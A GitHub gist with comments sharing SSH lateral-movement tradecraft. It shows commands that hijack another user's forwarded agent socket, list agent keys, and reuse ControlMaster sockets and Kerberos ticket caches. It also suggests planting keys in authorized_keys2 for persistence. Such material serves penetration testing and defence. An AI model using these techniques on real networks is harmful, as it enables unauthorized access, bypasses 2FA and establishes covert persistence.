Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

This post explains it well and details the safer ssh -J alternative.

@wvu-r7

This comment has been minimized.

Copy link

@wvu-r7 wvu-r7 commented Jan 7, 2021

👋 ❤️

Adding to this, ssh-add(1) can be used to list/manage identities. :)

root@[redacted]:~# SSH_AUTH_SOCK="/tmp/ssh-[redacted]/agent.[redacted]" ssh-add -l
256 SHA256:[redacted] [redacted].key (ED25519)
root@[redacted]:~#

The above example lists the fingerprints and private key filenames for a particular agent.

This technique works on both local and forwarded agents!

@int0x80

This comment has been minimized.

Copy link
Owner Author

@int0x80 int0x80 commented Jan 7, 2021

Fantastic recon technique! Thank you for the additional knowledge @wvu-r7 ❤️

@wvu-r7

This comment has been minimized.

Copy link

@wvu-r7 wvu-r7 commented Jan 7, 2021

Likewise! Thank you for sharing.

@0xdade

This comment has been minimized.

Copy link

@0xdade 0xdade commented Jan 7, 2021

Slightly tangential, but related to abusing ssh configurations for lateral movement:

Look for ControlMaster auto and ControlPath in ssh config files. You can use the ControlPath to find control sockets that are currently open to remote servers, then ssh to that same remote server, usually without having to reauthenticate or go through 2FA.

The down side to this is that you're multiplexed using the first connection, so if the first connection gets terminated then your connection also goes down. So maybe have something handy to be ready to drop backup keys (~/.ssh/authorized_keys2 is often still a valid keys file and not usually clobbered by host configuration tools like chef/puppet/salt/etc) or otherwise establish persistence once you ride-along.

@wvu-r7

This comment has been minimized.

Copy link

@wvu-r7 wvu-r7 commented Jan 7, 2021

That's also a great one, @0xdade! Thanks for the share. I guess while we're at it, haha...

Kerberos authentication can also be leveraged for lateral movement, often with SSH. The KRB5CCNAME environment variable can be set to the path of a user's credentials (ticket) cache, usually in /tmp. klist(1) can be used to view the cache.

@int0x80

This comment has been minimized.

Copy link
Owner Author

@int0x80 int0x80 commented Jan 7, 2021

@0xdade great add! I may have run into those in a former life 😉 Sometimes I have to remember to check /etc/ssh/ssh_config in addition to the home directory ~/.ssh/config files.

@wvu-r7 holy smokes, TIL! Can't wait to hit a Windows machine with this.

@wvu-r7

This comment has been minimized.

Copy link

@wvu-r7 wvu-r7 commented Jan 7, 2021

Both ssh -L and -R can forward Unix sockets, too. Might be useful when performing SSH gymnastics.

@dandare100

This comment has been minimized.

Copy link

@dandare100 dandare100 commented Jan 7, 2021

Thank you, this is cool stuff.
There are quite a few operations defined in the agent-forwarding spec.

A particularly interesting one is using the agent to perform private key signing operations, without having access to the key itself.

Here is a simple POC that shows this in action

https://github.com/dandare100/agentstub

@wvu-r7

This comment has been minimized.

Copy link

@wvu-r7 wvu-r7 commented Jan 7, 2021

Wish I could react to gist comments. Thanks for the contribution!

@int0x80

This comment has been minimized.

Copy link
Owner Author

@int0x80 int0x80 commented Jan 9, 2021

@dandare100 TIL! Thank you for sharing that.

@dandare100

This comment has been minimized.

Copy link

@dandare100 dandare100 commented Jan 10, 2021

cool runnings

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment